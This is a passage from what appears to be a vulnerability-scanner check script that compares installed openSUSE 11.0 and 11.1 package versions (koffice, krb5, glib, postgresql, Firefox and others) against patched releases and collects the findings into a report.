((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.3~132.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krusader\", rpm:\"krusader~1.99.2.beta2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libakonadi4\", rpm:\"libakonadi4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-2_0-0\", rpm:\"libgio-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-fam\", rpm:\"libgio-fam~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libglib-2_0-0\", rpm:\"libglib-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgmodule-2_0-0\", rpm:\"libgmodule-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas\", rpm:\"libgnomecanvas~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-devel\", rpm:\"libgnomecanvas-devel~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-doc\", rpm:\"libgnomecanvas-doc~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnomecanvas-lang\", rpm:\"libgnomecanvas-lang~2.20.1.1~25.81.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra-devel\", rpm:\"libgnutls-extra-devel~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra26\", rpm:\"libgnutls-extra26~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgobject-2_0-0\", rpm:\"libgobject-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgstinterfaces-0_10-0\", rpm:\"libgstinterfaces-0_10-0~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgthread-2_0-0\", rpm:\"libgthread-2_0-0~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal\", rpm:\"libkcal~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal-devel\", rpm:\"libkcal-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal2\", rpm:\"libkcal2~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkde4\", rpm:\"libkde4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkde4-devel\", rpm:\"libkde4-devel~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepim4\", rpm:\"libkdepim4~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepim4-devel\", rpm:\"libkdepim4-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepimlibs4\", rpm:\"libkdepimlibs4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkdepimlibs4-devel\", rpm:\"libkdepimlibs4-devel~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime-devel\", rpm:\"libkmime-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime2\", rpm:\"libkmime2~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkonq-devel\", rpm:\"libkonq-devel~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkonq5\", rpm:\"libkonq5~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef-devel\", rpm:\"libktnef-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef1\", rpm:\"libktnef1~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpcap-devel\", rpm:\"libpcap-devel~0.9.8~50.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpcap0\", rpm:\"libpcap0~0.9.8~50.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~126~17.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine-devel\", rpm:\"libxine-devel~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1\", rpm:\"libxine1~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1-gnome-vfs\", rpm:\"libxine1-gnome-vfs~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxine1-pulse\", rpm:\"libxine1-pulse~1.1.15~23.3.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"module-init-tools\", rpm:\"module-init-tools~3.4~56.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.6.16~1.47.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.6.16~1.47.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"phonon-backend-xine\", rpm:\"phonon-backend-xine~4.1.3~4.2.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.7~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xpcom190\", rpm:\"python-xpcom190~1.9.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan\", rpm:\"strongswan~4.2.8~1.24.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan-doc\", rpm:\"strongswan-doc~4.2.8~1.24.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.71.11~7.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~97.78.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~97.78.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-audio\", rpm:\"bluez-audio~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-test\", rpm:\"bluez-test~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-utils\", rpm:\"bluez-utils~3.32~8.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.7~25.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-branding-upstream\", rpm:\"glib2-branding-upstream~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.9~22.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2-lang\", rpm:\"gpg2-lang~2.0.9~22.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.11~8.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.11~8.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~157.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.3~50.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-2_0-0\", rpm:\"libgio-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgio-fam\", rpm:\"libgio-fam~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libglib-2_0-0\", rpm:\"libglib-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgmodule-2_0-0\", rpm:\"libgmodule-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-devel\", rpm:\"libgnutls-devel~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra-devel\", rpm:\"libgnutls-extra-devel~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls-extra26\", rpm:\"libgnutls-extra26~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgnutls26\", rpm:\"libgnutls26~2.2.2~17.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgobject-2_0-0\", rpm:\"libgobject-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgthread-2_0-0\", rpm:\"libgthread-2_0-0~2.16.3~20.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal\", rpm:\"libkcal~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal-devel\", rpm:\"libkcal-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkcal2\", rpm:\"libkcal2~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime-devel\", rpm:\"libkmime-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libkmime2\", rpm:\"libkmime2~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef-devel\", rpm:\"libktnef-devel~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libktnef1\", rpm:\"libktnef1~3.5.9~53.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.8~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.4.7~130.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.4.7~130.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.7~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan\", rpm:\"strongswan~4.2.1~11.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"strongswan-doc\", rpm:\"strongswan-doc~4.2.1~11.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.70.8~3.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"timezone\", rpm:\"timezone~2009d~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.12~8.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~95.4\", 